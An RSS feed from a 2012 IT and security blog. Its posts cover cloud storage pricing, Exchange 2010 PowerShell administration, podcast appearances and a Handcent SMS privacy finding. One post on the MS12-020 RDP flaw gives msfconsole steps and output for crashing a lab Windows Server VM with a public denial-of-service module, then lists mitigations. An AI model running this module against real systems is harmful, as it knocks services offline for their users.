<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Information Technology Enthusiast </title>
	<atom:link href="http://infolookup.securegossip.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://infolookup.securegossip.com</link>
	<description>Just another SecureGossip - United Security Blog Portal weblog</description>
	<lastBuildDate>Thu, 26 Apr 2012 17:59:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Battle of the cloud storage providers</title>
		<link>http://infolookup.securegossip.com/2012/04/26/battle-of-the-cloud-providers/</link>
		<comments>http://infolookup.securegossip.com/2012/04/26/battle-of-the-cloud-providers/#comments</comments>
		<pubDate>Thu, 26 Apr 2012 14:25:09 +0000</pubDate>
		<dc:creator>Sherwyn</dc:creator>
				<category><![CDATA[General Tech]]></category>
		<category><![CDATA[Web App Security]]></category>
		<category><![CDATA[Box]]></category>
		<category><![CDATA[Cloud Storage]]></category>
		<category><![CDATA[Dropbox]]></category>
		<category><![CDATA[Gdrive]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Mobile stroage client]]></category>
		<category><![CDATA[Skydrive]]></category>

		<guid isPermaLink="false">http://infolookup.securegossip.com/?p=726</guid>
		<description><![CDATA[With the recent show and tell of Google&#8217;s GDrive cloud storage solution its now painfully obvious that other cloud storage providers in that arena is scrambling for fear of lost of business.  As we all know Google has a track record of coming out with solutions to rivals the competitors and usually end up being [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://infolookup.securegossip.com/files/Free-Cloud-Storage-1.jpg"><img class="alignleft size-medium wp-image-730" src="http://infolookup.securegossip.com/files/Free-Cloud-Storage-1-300x170.jpg" alt="" width="300" height="170" /></a></p>
<p>With the recent show and tell of Google&#8217;s <a href="https://support.google.com/drive/bin/answer.py?hl=en&amp;answer=2374993&amp;topic=14940&amp;ctx=topic">GDrive</a> cloud storage solution its now painfully obvious that other cloud storage providers in that arena is scrambling for fear of lost of business.  As we all know Google has a track record of coming out with solutions to rivals the competitors and usually end up being the victor. This market is getting very popular over the last few years and statically it has been proven that users that started off as a free users will eventually become paying customers so the key is to get as much free users as possible.</p>
<p>For the last year or so the words &#8220;free cloud storage&#8221; was almost synonymous with &#8220;Dropbox&#8221;, even on the mobile platform their application was widely accepted now with Google finally in the arena its going to be interesting to see how others will start to change their business model. I have recently received some form of communication form the following providers of (Skydrive, Box, Dropbox, Ubuntu One) and wanted to give a brief summary of them and see how the might stack-up  to GDrive.</p>
<p>Lets start with <strong>GDrive</strong>, they are offering a <strong>5 GB</strong> free for new users,  has a mobile application (Android devices), GDocsDrive desktop client, allows all of the average features (upload, share, collaborate),  and as of now it appears they have a<strong> 10GB</strong> file size upload limitation. The other interesting thing about this is the fact that to upgrade to <strong>25 GB</strong> a month it will only cost you <strong>$2.50</strong>, or <strong>100GB</strong> for just <strong>$4.99/mo.</strong> The one reason that I believe the might capture a large piece of market share is simply based on their name and the fact that they have a solid infrastructure and should be able to handle larger traffic than the average provider in this sphere.</p>
<p>Next is<strong> <a href="https://www.dropbox.com/pricing">Dropbox</a></strong>which is a free service that lets you bring all your photos, docs, and videos anywhere. This means that any file you save to your Dropbox will automatically save to all your <a href="https://www.dropbox.com/install">computers</a>, <a href="https://www.dropbox.com/anywhere">phones</a> and even the <a href="https://www.dropbox.com/">Dropbox website</a>. The start off with <strong>2GB </strong>free and additional <strong>500 MB</strong> per referral, now the paid model starts with 50 GB for <strong>$10/mo</strong>, and has a file size upload limit of<strong> 2GB </strong>however if you upload files via the website you have a <strong>300 MB cap.</strong></p>
<p><strong>Skydrive, </strong>who has been trying to gain popularity for a while and at one point offered you <strong>25GB </strong>free storage recently restructured and is only offering <strong>7GB </strong>free for all new users, you had the option to keep your  25GB if you were a old users but you had to log in and claim it before April 22 which has already passed. If you require more space and you love Skydrive you can get <strong>20GB/$10yr or 100GB for $50/yr</strong>. As of now Skydrive offer the most free space and the most value for your money per space annually.</p>
<p><strong>Box </strong>is another competitor who tried recently to gain new users by offering mobile users<strong> 50GB </strong>free for life if the signed up from their mobile device. If you don&#8217;t use this option you can always get <strong>25GB </strong>for<strong> $10/mo or 50GB for $20/mo</strong>. They have a few downfalls, the have  a <strong>200MB</strong> file upload cap, and of course the only offer a desktop client solution<strong> business/enterprise </strong>users only.<strong></strong></p>
<p>Last on my list is<strong> Ubuntu One </strong>who currently offer your standard <strong>5GB</strong> for free users and you can get an additional<strong> 20GB for $3/mo or $30/yr.</strong> The good thing about this is you are getting a good value for your money however I don&#8217;t think the do a good job marking this product and as such I believe the might fade into the background amidst all the other big names out there.<strong></strong></p>
<p>For a great overview of some of the services mentioned above you can take a glance at this  comparison image I found over at<strong> <a href="http://www.pcworld.com/article/254411/google_drive_vs_the_rest.html">PCWorld</a></strong></p>
<p><strong><a href="http://infolookup.securegossip.com/files/google_drive_comparison_chart2-11351611.jpg"><img class="aligncenter size-medium wp-image-736" src="http://infolookup.securegossip.com/files/google_drive_comparison_chart2-11351611-300x136.jpg" alt="" width="300" height="136" /></a>What services are you using?<br />
</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://infolookup.securegossip.com/2012/04/26/battle-of-the-cloud-providers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MS12-020 RDP Vulnerability overview and testing</title>
		<link>http://infolookup.securegossip.com/2012/03/24/ms12-020-rdp-vulnerabilty-overview-and-testing/</link>
		<comments>http://infolookup.securegossip.com/2012/03/24/ms12-020-rdp-vulnerabilty-overview-and-testing/#comments</comments>
		<pubDate>Sat, 24 Mar 2012 21:48:29 +0000</pubDate>
		<dc:creator>Sherwyn</dc:creator>
				<category><![CDATA[How To's]]></category>
		<category><![CDATA[Infosec]]></category>
		<category><![CDATA[Demo]]></category>
		<category><![CDATA[Infosec News]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[MS12-020]]></category>
		<category><![CDATA[MSFconsole]]></category>
		<category><![CDATA[RDP Vulnerability]]></category>
		<category><![CDATA[Testing]]></category>

		<guid isPermaLink="false">http://infolookup.securegossip.com/?p=713</guid>
		<description><![CDATA[By now if you have been paying attention to your news readers, Google plus or twitter feed you would have noticed that Microsoft released a patch to a nasty denial of service (DOS) vulnerability. Here is a bit of information about the vulnerability; &#8220;This security update resolves two privately reported vulnerabilities in the Remote Desktop [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://infolookup.securegossip.com/files/rdc_icon.jpg.png"><img class="alignleft size-full wp-image-715" src="http://infolookup.securegossip.com/files/rdc_icon.jpg.png" alt="" width="155" height="148" /></a><br />
<strong></strong></p>
<p>By now if you have been paying attention to your news readers, Google plus or twitter feed you would have noticed that Microsoft released a patch to a nasty denial of service (DOS) vulnerability. Here is a bit of information about the <a href="http://technet.microsoft.com/en-us/security/bulletin/ms12-020">vulnerability</a>; &#8220;This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol. The more severe of these vulnerabilities could allow remote code execution if an attacker sends a sequence of specially crafted RDP packets to an affected system.&#8221;</p>
<p>In short the system would crash and have a &#8220;blue screen of death&#8221; thus causing the system to reboot. Now the other option would allow and attach to have remote code execution on the affected system. Even though this patch was released over two weeks ago most organizations are still vulnerable and that&#8217;s not because the choose to be however most places have a  &#8220;patch cycle&#8221; which require extensive testing prior to deployment.</p>
<div>As explained by the fine people over at <a href="http://isc.sans.edu/diary.html?storyid=12808">ISC Diary </a>The Microsoft released patch has several reference KB&#8217;s which includes &#8221; <a href="http://support.microsoft.com/kb/2671387">KB2671387</a> (Remote Code Execution &#8211; <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0002">CVE-2012-0002</a>) and <a href="http://support.microsoft.com/kb/2667402">KB2667402</a> (Denial of Service &#8211; <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0152">CVE-2012-0152</a>) or <a href="http://support.microsoft.com/kb/2621440">KB2621440</a>. The reference for the update you&#8217;ll see on a Windows system, when installed, depends on the version of the OS you&#8217;re running. For Windows 7 you&#8217;ll likely note KB2667402, whereas you should only expect KB2621440 on a Windows XP host. As always before applying any patch ensure that you read the release notes.</div>
<div></div>
<div>We recently patched our internet facing servers that had RDP enabled and everything went well with the exception of one server that we were unable to log back into via RDP, we had to gain access to the server via the ILO port then applied a few additional patches then rebooted and that seen to solve the issue.Now for the fun part if you would like to test the proof of concept exploit for this vulnerability grab a copy of <a href="http://www.metasploit.com/download/">Metasploit</a> follow the steps below.</div>
<div><strong> My Test setup:</strong></div>
<div>
<ul>
<li>Linux (SolusOS)</li>
<li>VirtualBox VM running Windows Server 2008 (with RDP enabled)</li>
</ul>
<p>Launch msfconsole and follow the steps outlined <a href="http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids">here</a>:</p>
<p><span style="color: #008000"><strong>msf &gt; use auxiliary/dos/windows/rdp/ms12_020_maxchannelids<br />
<span style="color: #008000">msf  auxiliary<span style="color: #800000">(ms12_020_maxchannelids</span>) &gt; show options</span></strong></span></p>
<p><strong><span style="color: #008000">Module options (<span style="color: #800000">auxiliary/dos/windows/rdp/ms12_020_maxchannelids</span>):</span></strong></p>
<p><strong><span style="color: #008000">Name   Current Setting  Required  Description</span></strong><br />
<strong><span style="color: #008000"> &#8212;-   &#8212;&#8212;&#8212;&#8212;&#8212;  &#8212;&#8212;&#8211;  &#8212;&#8212;&#8212;&#8211;</span></strong><br />
<strong><span style="color: #008000"> RHOST                   yes       The target address</span></strong><br />
<strong><span style="color: #008000"> RPORT  3389             yes       The target port</span></strong></p>
<p><strong><span style="color: #008000">msf  auxiliary(<span style="color: #800000">ms12_020_maxchannelids</span>) &gt; set RHOST 192.168.2.10</span></strong><br />
<strong><span style="color: #008000"> RHOST =&gt; 192.168.2.10</span></strong><br />
<strong><span style="color: #008000"> msf  auxiliary(<span style="color: #800000">ms12_020_maxchannelids)</span> &gt; run</span></strong></p>
<p><strong><span style="color: #008000">[*] 192.168.2.10:3389 &#8211; Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS</span></strong><br />
<strong><span style="color: #008000"> [*] 192.168.2.10:3389 &#8211; 210 bytes sent</span></strong><br />
<strong><span style="color: #008000"> [*] 192.168.2.10:3389 &#8211; Checking RDP status&#8230;</span></strong><br />
<strong><span style="color: #008000"> [+] 192.168.2.10:3389 seems down</span></strong><br />
<strong><span style="color: #008000"> [*] Auxiliary module execution completed</span></strong><br />
<strong> <span style="color: #000000"><br />
RHOST = The vulnerable host that is running a vulnerable version of RDP</span></strong></p>
</div>
<div style="text-align: center"><strong><strong><span style="color: #800000">Screenshot of server 2008 reacting to the exploit</span></strong></strong></div>
<div><a href="http://infolookup.securegossip.com/files/demo.png"><img class="aligncenter size-medium wp-image-718" src="http://infolookup.securegossip.com/files/demo-300x261.png" alt="" width="300" height="261" /></a>Now go on out and patch your systems and if you have some time load Metasploit on a host of your choice and do some testing.</div>
<p><strong>Mitigation</strong>:</p>
<ul>
<li><a href="http://technet.microsoft.com/en-us/library/cc727977%28v=ws.10%29.aspx" target="_blank">If you don&#8217;t need RDP open to the external world disable it</a></li>
<li><a href="http://support.microsoft.com/kb/306759" target="_blank">Change the default port everyone know its 3389</a></li>
<li><a href="http://technet.microsoft.com/en-us/library/cc732713.aspx" target="_blank">Enable network level authentication (NLA) </a></li>
</ul>
<p><a href="http://isc.sans.edu/diary.html?storyid=12808" target="_blank">http://isc.sans.edu/diary.html?storyid=12808</a><a href="http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids" target="_blank"></p>
<p>http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids</a></p>
<p><a href="http://technet.microsoft.com/en-us/library/cc732713.aspx" target="_blank">http://technet.microsoft.com/en-us/library/cc732713.aspx</a></p>
]]></content:encoded>
			<wfw:commentRss>http://infolookup.securegossip.com/2012/03/24/ms12-020-rdp-vulnerabilty-overview-and-testing/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>SendAs from a distribution group Exchange 2010</title>
		<link>http://infolookup.securegossip.com/2012/03/20/sendas-from-a-distribution-group-exchange-2010/</link>
		<comments>http://infolookup.securegossip.com/2012/03/20/sendas-from-a-distribution-group-exchange-2010/#comments</comments>
		<pubDate>Tue, 20 Mar 2012 17:15:51 +0000</pubDate>
		<dc:creator>Sherwyn</dc:creator>
				<category><![CDATA[Email]]></category>
		<category><![CDATA[General Tech]]></category>
		<category><![CDATA[How To's]]></category>
		<category><![CDATA[Distribution Group]]></category>
		<category><![CDATA[Exchange Server 2010]]></category>
		<category><![CDATA[Grant Permission]]></category>
		<category><![CDATA[Powershell]]></category>
		<category><![CDATA[SendAs]]></category>

		<guid isPermaLink="false">http://infolookup.securegossip.com/?p=707</guid>
		<description><![CDATA[I received a request today from one of our users who wanted to send and email from their departmental distribution group. Now this task can be easily performed if a user wanted to do a send as from a public folder however with Exchange 2010 you are unable to grant a user the correct access [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://infolookup.securegossip.com/files/Exchange-2010-Logo-733341.png"><img class="alignleft  wp-image-710" src="http://infolookup.securegossip.com/files/Exchange-2010-Logo-733341-300x143.png" alt="" width="175" height="83" /></a></p>
<p>I received a request today from one of our users who wanted to send and email from their departmental distribution group. Now this task can be easily performed if a user wanted to do a send as from a public folder however with Exchange 2010 you are unable to grant a user the correct access via the EMC.</p>
<p>In order to grant a user this access you have to do it via the Exchange management shell &#8220;EMS&#8221; aka PowerShell. My first question was did the user really meant to say Public folder or was it an actual DG? To answer this question I ran the following command:</p>
<p><span style="color: #008000">get-recipient -results unlimited | where {$_.emailaddresses -match &#8220;accounting@domain.com&#8221;} | select name,emailaddresses,recipienttype</span></p>
<p>Once I realized that I was working with a distribution group I then ran  this command to grant the user &#8220;send as &#8221; permission:</p>
<p><span style="color: #008000">Get-DistributionGroup &#8220;accounting&#8221; | Add-ADPermission -ExtendedRights Send-As -User &#8220;Jane Doe&#8221; -AccessRights ExtendedRight | fl</span></p>
<p>And just like that I had another satisfied user <img src='http://infolookup.securegossip.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> . If you know of another way to accomplish this task do share in the comments.</p>
]]></content:encoded>
			<wfw:commentRss>http://infolookup.securegossip.com/2012/03/20/sendas-from-a-distribution-group-exchange-2010/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DroidNation podcast appearance</title>
		<link>http://infolookup.securegossip.com/2012/03/09/droidnation-podcast-appearance/</link>
		<comments>http://infolookup.securegossip.com/2012/03/09/droidnation-podcast-appearance/#comments</comments>
		<pubDate>Fri, 09 Mar 2012 03:30:04 +0000</pubDate>
		<dc:creator>Sherwyn</dc:creator>
				<category><![CDATA[Presentation/Talks]]></category>
		<category><![CDATA[Android]]></category>
		<category><![CDATA[DroidNation]]></category>
		<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://infolookup.securegossip.com/?p=699</guid>
		<description><![CDATA[&#160; &#160; &#160; About a week or two ago I appeared on a pretty awesome podcast called DroidNation (eps 15).  DroidNation is basically the podcast for anyone that is looking to take back control of their device, from rooting to roming to overclocking you name it the got it. Every episode leaves you wanting for [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://infolookup.securegossip.com/files/android_podcast_blue.gif"><img class="alignleft size-full wp-image-700" src="http://infolookup.securegossip.com/files/android_podcast_blue.gif" alt="" width="190" height="135" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>About a week or two ago I appeared on a pretty awesome podcast called <a href="http://frostbitemedia.org/node/60?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A+DroidNationmp3+%28Droidnation%29&amp;utm_content=FeedBurner" target="_blank">DroidNation</a> (eps 15).  DroidNation is basically the podcast for anyone that is looking to take back control of their device, from rooting to roming to overclocking you name it the got it. Every episode leaves you wanting for more. During my segment I spoke a bit about Android security, you can get the show notes<a href="http://romingmydroid.com/viewtopic.php?f=243&amp;t=46" target="_blank"> here</a>.</p>
<p>In short if you have not heard about  <a href="http://frostbitemedia.org/" target="_blank">frostbite media</a> network or DroidNation go out and add it to your podcast app  and have fun unlocking the power of your Android system.</p>
]]></content:encoded>
			<wfw:commentRss>http://infolookup.securegossip.com/2012/03/09/droidnation-podcast-appearance/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Retention policy with a twist of MRM Exchange 2010</title>
		<link>http://infolookup.securegossip.com/2012/01/25/rentention-policies-with-a-twist-of-mrm-exch-2010/</link>
		<comments>http://infolookup.securegossip.com/2012/01/25/rentention-policies-with-a-twist-of-mrm-exch-2010/#comments</comments>
		<pubDate>Wed, 25 Jan 2012 13:13:52 +0000</pubDate>
		<dc:creator>Sherwyn</dc:creator>
				<category><![CDATA[Email]]></category>
		<category><![CDATA[How To's]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Exchange 2010 sp1]]></category>
		<category><![CDATA[Managed Folder Policy]]></category>
		<category><![CDATA[ManagedFolder]]></category>
		<category><![CDATA[MRM]]></category>
		<category><![CDATA[Powershell]]></category>
		<category><![CDATA[Retention Policy]]></category>

		<guid isPermaLink="false">http://infolookup.securegossip.com/?p=692</guid>
		<description><![CDATA[I was recently working on a project that involved creating some Retention policies for our Exchange 2010 sp1 environment. The project got a bit scary in the testing phase when we realized that the Inbox deletion policies were also deleting emails in the user&#8217;s sub-folder.  The came as a surprise to us since we were [...]]]></description>
			<content:encoded><![CDATA[<p>I was recently working on a project that involved creating some Retention policies for our Exchange 2010 sp1 environment. The project got a bit scary in the testing phase when we realized that the Inbox deletion policies were also deleting emails in the user&#8217;s sub-folder.  The came as a surprise to us since we were able to use the same type of policy in Exchange 2003 prior to upgrading.</p>
<p>To solve this issue we had to create retention policies to manage our deleted items, sent items, and drafts but use message record management to handle our inbox. Since MRM was being phased out of 2010 this solution needed to be implemented via the Exchange management shell (Powershell).</p>
<p style="text-align: center"><strong>Implementing MRM:</strong></p>
<p><a href="http://infolookup.securegossip.com/files/MRM.gif"><img class="aligncenter size-medium wp-image-693" src="http://infolookup.securegossip.com/files/MRM-256x300.gif" alt="" width="256" height="300" /></a><strong></strong></p>
<p><a href="http://technet.microsoft.com/en-us/library/dd335093.aspx"><strong>Messaging records management (MRM)</strong></a> is the records management technology in Microsoft Exchange Server 2010 that helps organizations reduce the legal risks associated with e-mail. MRM makes it easier to keep the messages needed to comply with company policy, government regulations, or legal needs, and to remove content that has no legal or business value.</p>
<p>Prior to implementing this its best to check to see if any additional policies were created and if you don&#8217;t play on using them going forward delete them. You can do so with the below commands:</p>
<p><span style="color: #800000"><strong>Review commands:</strong></span></p>
<p><strong><span style="text-decoration: underline">ManagedFolderMailboxPolicy</span></strong></p>
<p><span style="color: #008000"> [PS] C:\Windows\system32&gt;<strong>Get-ManagedFolderMailboxPolicy</strong></span></p>
<p><span style="color: #008000">Name                      ManagedFolderLinks</span></p>
<p><span style="color: #008000">&#8212;-                              &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</span></p>
<p><span style="color: #008000">Test Policy1            {Inbox}</span></p>
<p><strong><span style="text-decoration: underline"><br />
ManagedContentSettings</span></strong></p>
<p><span style="color: #008000"> [PS] C:\Windows\system32&gt;<strong>Get-ManagedContentSettings</strong></span></p>
<p><span style="color: #008000"> Name                      MessageClass              ManagedFolderName</span></p>
<p><span style="color: #008000">&#8212;-                            &#8212;&#8212;&#8212;&#8212;- &#8212;&#8212;&#8212;&#8212;              &#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</span></p>
<p><span style="color: #008000">Inbox Content               *                                           Inbox1</span></p>
<p><strong><span style="text-decoration: underline"><br />
ManagedFolder</span></strong></p>
<p><span style="color: #008000"> [PS] C:\Windows\system32&gt;<strong>Get-ManagedFolde</strong>r</span></p>
<p><span style="color: #008000"> Name                      FolderName                Description</span></p>
<p><span style="color: #008000">&#8212;-                              &#8212;&#8212;&#8212;-                &#8212;&#8212;&#8212;&#8211;</span></p>
<p><span style="color: #008000">Inbox1                    Inbox                     ManagedDefaultFolder</span></p>
<p>After retrieving this information you can now issue the following commands to remove any old or test policy:</p>
<p><strong><span style="text-decoration: underline">Remove Policy from users</span></strong></p>
<p><strong></strong><span style="color: #008000">Set-Mailbox username -ManagedFolderMailboxPolicy $null</span></p>
<p><strong><span style="text-decoration: underline">Removed ManagedFolder Mailbox Policy</span></strong><strong></strong></p>
<p><span style="color: #008000">[PS] C:\Windows\system32&gt;Remove-ManagedFolderMailboxPolicy &#8220;Test Inbox Policy&#8221;</span></p>
<p><strong><span style="text-decoration: underline">Remove Manage Content Setting</span></strong><strong></strong></p>
<p><span style="color: #008000"><strong> </strong>[PS] C:\Windows\system32&gt;Remove-ManagedContentSettings &#8220;Inbox Content&#8221;</span><br />
<strong>Creating and Implementing MRM:</strong></p>
<ol>
<li>Create your managed folder</li>
<li>Create your managed folder content setting</li>
<li>Create your manage mailbox folder policy</li>
<li>Apply your policy to a user or to an exchange data store.</li>
<li>Start the managed folder assistant service or wait for it process on schedule</li>
</ol>
<p><span style="color: #800000">The below policy will delete all emails from the user mailbox that are 60 days old without touching any sub folders in the user&#8217;s Inbox.</span><strong><span style="text-decoration: underline"><br />
</span></strong></p>
<p><strong><span style="text-decoration: underline">Managed Folder Creation</span></strong><strong></strong></p>
<p><span style="color: #008000"> New-ManagedFolder -Name &#8220;Test Inbox&#8221; -DefaultFolderType Inbox -BaseFolderOnly $true -Comment &#8220;Items would be moved to deleted items for 60 days&#8221; -MustDisplayCommentEnabled  $true</span></p>
<p><strong><span style="text-decoration: underline">Managed Folder Content Settings</span></strong></p>
<p><span style="color: #008000">New-ManagedContentSettings -Name &#8220;Test Content&#8221; -FolderName &#8220;Test Inbox&#8221; -MessageClass * -AgeLimitForRetention 60 -RetentionAction MoveToDeletedItems -RetentionEnabled $true -TriggerForRetention WhenDelivered</span></p>
<p><strong> <span style="text-decoration: underline">Managed Mailbox Folder Policy</span></strong><strong></strong></p>
<p><strong></strong><span style="color: #008000">New-ManagedFolderMailboxPolicy -Name &#8220;TestPolicy&#8221; -ManagedFolderLinks &#8220;Test Inbox&#8221;</span><strong></strong></p>
<p><strong><br />
<span style="text-decoration: underline">Verify settings</span></strong><strong></strong></p>
<p><span style="color: #008000">[PS] C:\Windows\system32&gt;Get-ManagedFolderMailboxPolicy &#8220;TestPolicy&#8221; |fl</span></p>
<p><span style="color: #008000">[PS] C:\Windows\system32&gt;Get-ManagedContentSettings &#8220;Test Content&#8221;|fl</span></p>
<p><span style="color: #008000">[PS] C:\Windows\system32&gt;Get-ManagedFolder &#8220;Test Inbox&#8221; |fl</span></p>
<p>&nbsp;</p>
<p><strong><span style="text-decoration: underline">Start the Managed Folder Assistant to process the mailbox</span></strong><strong>.</strong></p>
<p><strong>Apply to single user:</strong></p>
<p><span style="color: #008000"><strong> </strong>Set-Mailbox -Identity testuser -ManagedFolderMailboxPolicy &#8220;TestPolicy&#8221;</span></p>
<p><span style="color: #008000">Start-ManagedFolderAssistant -ID  testuser</span></p>
<p><strong>Apply to a database level:</strong></p>
<p><span style="color: #008000">Get-Mailbox –database “Database Name” | Set-Mailbox –ManagedFolderMailboxPolicy “Name of the Policy”</span></p>
<p><span style="color: #800000"><strong>Tip:</strong></span></p>
<p>If you run into issues wait about 30 mins for the folders to replicate after created them. You can also stop and restart the &#8220;Managed Folder Assistant&#8221; service.</p>
<p>&nbsp;</p>
<p>Would love to know how others handled this issue.</p>
<p><strong>References:</strong></p>
<p><a href="http://technet.microsoft.com/en-us/library/bb508901%28EXCHG.80%29.aspx">http://technet.microsoft.com/en-us/library/bb508901%28EXCHG.80%29.aspx</a><br />
<a href="http://technet.microsoft.com/en-us/library/dd335093.aspx">http://technet.microsoft.com/en-us/library/dd335093.aspx</a></p>
]]></content:encoded>
			<wfw:commentRss>http://infolookup.securegossip.com/2012/01/25/rentention-policies-with-a-twist-of-mrm-exch-2010/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Podcast Appearance &#8220;Attack of the Android&#8221;</title>
		<link>http://infolookup.securegossip.com/2012/01/18/podcast-appearance-attack-of-the-android/</link>
		<comments>http://infolookup.securegossip.com/2012/01/18/podcast-appearance-attack-of-the-android/#comments</comments>
		<pubDate>Wed, 18 Jan 2012 15:57:59 +0000</pubDate>
		<dc:creator>Sherwyn</dc:creator>
				<category><![CDATA[General Tech]]></category>
		<category><![CDATA[Infosec News]]></category>
		<category><![CDATA[AOTA]]></category>
		<category><![CDATA[Attack of the Androids Podcast]]></category>
		<category><![CDATA[Hancent SMS]]></category>
		<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://infolookup.securegossip.com/?p=688</guid>
		<description><![CDATA[Hello all, I hope your year is going well so far; I just wanted to drop a line and mention that a few weeks ago I appeared on &#8220;Attack of the Androids&#8221; podcast esp 16. A little background about the podcast, the are a weekly audio podcast focused on the Google Android operating system and [...]]]></description>
			<content:encoded><![CDATA[<p>Hello all, I hope your year is going well so far; I just wanted to drop a line and mention that a few weeks ago I appeared on <a href="http://www.groovypost.com/groovycast/attack-of-the-androids/ep16-malware-for-mobile/" target="_blank">&#8220;Attack of the Androids&#8221;</a> podcast esp 16. A little background about the podcast, the are a weekly audio podcast focused on the Google Android operating system and community.</p>
<p>You can find them on <a href="https://plus.google.com/118372362357279886969/posts" target="_blank">Google +</a> or follow them on twitter <strong><a href="https://twitter.com/#!/search/aotaradio" target="_blank"><strong>@aotaradio</strong></a>    </strong>kool cast check them out!</p>
]]></content:encoded>
			<wfw:commentRss>http://infolookup.securegossip.com/2012/01/18/podcast-appearance-attack-of-the-android/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Handcent SMS logging your sent messages:Update</title>
		<link>http://infolookup.securegossip.com/2012/01/04/handcent-sms-logging-your-sent-messagesupdate/</link>
		<comments>http://infolookup.securegossip.com/2012/01/04/handcent-sms-logging-your-sent-messagesupdate/#comments</comments>
		<pubDate>Wed, 04 Jan 2012 06:52:45 +0000</pubDate>
		<dc:creator>Sherwyn</dc:creator>
				<category><![CDATA[General Tech]]></category>
		<category><![CDATA[Metadata Analysis]]></category>
		<category><![CDATA[Networking and Security]]></category>
		<category><![CDATA[Privacy]]></category>
		<category><![CDATA[Handcent SMS]]></category>
		<category><![CDATA[Logging]]></category>
		<category><![CDATA[Messages]]></category>
		<category><![CDATA[TextSecure]]></category>

		<guid isPermaLink="false">http://infolookup.securegossip.com/?p=680</guid>
		<description><![CDATA[I first posted about this issue back in Dec 18th of 2011, Handcent SMS one of the most popular SMS applications on the android market with over 10,000,000 downloads was doing some things that raised a few privacy questions.  As stated in my last post Handcent was  logging all your sent messages even after you [...]]]></description>
			<content:encoded><![CDATA[<p>I first posted about this issue back in <a href="http://infolookup.securegossip.com/2011/12/18/handcent-sms-logs-all-your-send-messages/">Dec 18th of 2011</a>, Handcent SMS one of the most popular SMS applications on the android market with over 10,000,000 downloads was doing some things that raised a few privacy questions.  As stated in my last post Handcent was  logging all your sent messages even after you deleted them from within the application.</p>
<p>I tried contacting them via email and twitter but the refused to comment on my findings. However 5 days later to my amazement I noticed the released a new version &#8220;3.9.9.9&#8243;. Take a look at the change log:</p>
<ul>
<ul>
<li>#3.9.9.9</li>
</ul>
</ul>
<ul>
<ul>
<li>Improve Galaxy Nexus (Android 4.0) support</li>
</ul>
</ul>
<ul>
<ul>
<li>New Skin for XMas 2012,Cool.</li>
</ul>
</ul>
<ul>
<ul>
<li><span style="color: #008000"><span style="color: #008000"><strong>Add auto delete old message option</strong></span></span></li>
</ul>
</ul>
<ul>
<ul>
<li>Add Mms signature option</li>
</ul>
</ul>
<ul>
<ul>
<li>Merry XMas to all users</li>
</ul>
</ul>
<p>Now after installing the new version I noticed I was still able to see my sent messages after I deleted them so I am not so certain the issue was addressed. I would however like to know if &#8220;<strong><span style="color: #008000">Add auto delete old message option</span></strong></p>
<p><strong>&#8220;</strong> means the will purge the messages from the database on a random schedule at some point. Again since Handcent refuse to comment on this issue we can only assume for now.</p>
<p>Don&#8217;t think that all hope is lost or that you are stuck with the stock messaging application, thanks to brilliant mind of Moxie Marlinspike and others over at <a href="http://www.whispersys.com/whispercore.html">Whisper System</a>, &#8220;TextSecure Beta&#8221; was birthed on Dec 21, 2011.</p>
<p><a href="https://market.android.com/details?id=org.thoughtcrime.securesms&amp;feature=search_result#?t=W251bGwsMSwxLDEsIm9yZy50aG91Z2h0Y3JpbWUuc2VjdXJlc21zIl0.">TextSecure </a>is a security enhanced text messaging application that serves as a full replacement for the default text messaging application. Messages to other TextSecure users are encrypted over the air, and all text messages are stored in an encrypted database on the device. If your phone is lost or stolen, your messages will be safe, and communication with other TextSecure users can&#8217;t be monitored over the air.</p>
<p>In short if you are ready to give up on Handcent this might be a good alternative, I know so far I feel much more secure using this application. I even tried browsing the db and I can confirm that the messages are indeed encrypted.</p>
]]></content:encoded>
			<wfw:commentRss>http://infolookup.securegossip.com/2012/01/04/handcent-sms-logging-your-sent-messagesupdate/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
